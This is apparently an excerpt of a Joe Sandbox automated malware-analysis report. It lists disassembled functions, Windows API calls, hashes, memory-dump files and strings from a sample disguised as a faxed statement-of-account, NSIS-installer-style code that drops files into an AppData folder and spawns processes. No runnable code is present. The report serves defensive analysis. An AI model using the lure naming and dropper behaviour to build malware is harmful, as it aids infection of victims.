                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileStringWrite
                                                                                              • String ID:
                                                                                              • API String ID: 390214022-0
                                                                                              • Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                              • Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
                                                                                              • Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                              • Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD
                                                                                              APIs
                                                                                              • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,?,0040CEF0,00403579,0040CEF0,?,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3934441357-0
                                                                                              • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                              • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                                                                                              • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                              • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                                                                                              APIs
                                                                                              • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                              • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                                                                                              • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                              • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406563,?,00000000,?,?,: Completed,?), ref: 004064F9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID:
                                                                                              • API String ID: 71445658-0
                                                                                              • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                              • Instruction ID: 5036765eb4ab6e58186d81024f5778724aa2024cd81e2e1d5ca813995cf5404a
                                                                                              • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                              • Instruction Fuzzy Hash: BAD0123210020DBBDF115F90AD01FAB375DAB08310F018426FE06A4092D775D534A728
                                                                                              APIs
                                                                                              • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 10285b655b8aef72648b26466f9f25ce2d7be6fe6636c6844ef788371d117144
                                                                                              • Instruction ID: 77b6755767f32433cbba579d7de441064f90f02de732d0e129c6c43bd553ff67
                                                                                              • Opcode Fuzzy Hash: 10285b655b8aef72648b26466f9f25ce2d7be6fe6636c6844ef788371d117144
                                                                                              • Instruction Fuzzy Hash: F6D0C772B08100DBDB11DBA8AA08B8D73A0AB00328B208537D001F21D0E6B8C8469A2E
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: 8557fc69485774ba4641c6a2d2b4437b1a5152abf7221d5f63999a85994ee7b6
                                                                                              • Instruction ID: 1d0f09303225af8c469e983b8f6ba21d59f3f36861eec243a4bc5be8392dea83
                                                                                              • Opcode Fuzzy Hash: 8557fc69485774ba4641c6a2d2b4437b1a5152abf7221d5f63999a85994ee7b6
                                                                                              • Instruction Fuzzy Hash: 9EC09B71741700FBDE209B509F45F077794A754701F154979B741F60E0D775D410D62D
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 973152223-0
                                                                                              • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                              • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                              • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                              • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
                                                                                              • Instruction ID: 26063d6d883ff380d2e1d7f9fe2b9d631bf033e6200e0a233fd0d302f8c02db7
                                                                                              • Opcode Fuzzy Hash: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
                                                                                              • Instruction Fuzzy Hash: 5BB01235286A00FBDE614B00DE09F457E62F764B01F048078F741240F0CAB300B5DF19
                                                                                              APIs
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,004043BD), ref: 004045F0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallbackDispatcherUser
                                                                                              • String ID:
                                                                                              • API String ID: 2492992576-0
                                                                                              • Opcode ID: b9cabee76f1705efe6df0b682491f715d60f75bd340f366a7093c5de42737780
                                                                                              • Instruction ID: 97f05af551d2e904d84950d91e3a9b28448307360fbef328a82585e9573e9e03
                                                                                              • Opcode Fuzzy Hash: b9cabee76f1705efe6df0b682491f715d60f75bd340f366a7093c5de42737780
                                                                                              • Instruction Fuzzy Hash: DBA001B6604500ABDE129F61EF09D0ABB72EBA4B02B418579A28590034CA365961FB1D
                                                                                              APIs
                                                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(Spiltovene16,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Spiltovene16,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                • Part of subcall function 004056CA: lstrcatW.KERNEL32(Spiltovene16,004030A8,004030A8,Spiltovene16,00000000,00000000,00000000), ref: 00405725
                                                                                                • Part of subcall function 004056CA: SetWindowTextW.USER32(Spiltovene16,Spiltovene16), ref: 00405737
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                • Part of subcall function 00405C4B: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,00000000,00000000), ref: 00405C74
                                                                                                • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                                                                • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                                                                • Part of subcall function 00406AE0: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B13
                                                                                                • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 2972824698-0
                                                                                              • Opcode ID: 35a5ddfd709be1b418303c5b5b878c4a8a7949f02034bdec2f23db080cb58fdd
                                                                                              • Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
                                                                                              • Opcode Fuzzy Hash: 35a5ddfd709be1b418303c5b5b878c4a8a7949f02034bdec2f23db080cb58fdd
                                                                                              • Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404B04
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                                                                              • lstrcmpiW.KERNEL32(: Completed,00423748,00000000,?,?), ref: 00404C1C
                                                                                              • lstrcatW.KERNEL32(?,: Completed), ref: 00404C28
                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C3A
                                                                                                • Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00000400,00404C71), ref: 00405CBF
                                                                                                • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                                                • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                                                • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                                                • Part of subcall function 004068EF: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                                              • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                                                                                                • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                                                • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                                                                                • Part of subcall function 00404E71: SetDlgItemTextW.USER32(?,00423748), ref: 00404F2E
                                                                                              Strings
                                                                                              • A, xrefs: 00404BD8
                                                                                              • H7B, xrefs: 00404BB2
                                                                                              • C:\Users\user\AppData\Roaming\floddeltaers, xrefs: 00404C05
                                                                                              • : Completed, xrefs: 00404C16, 00404C1B, 00404C26
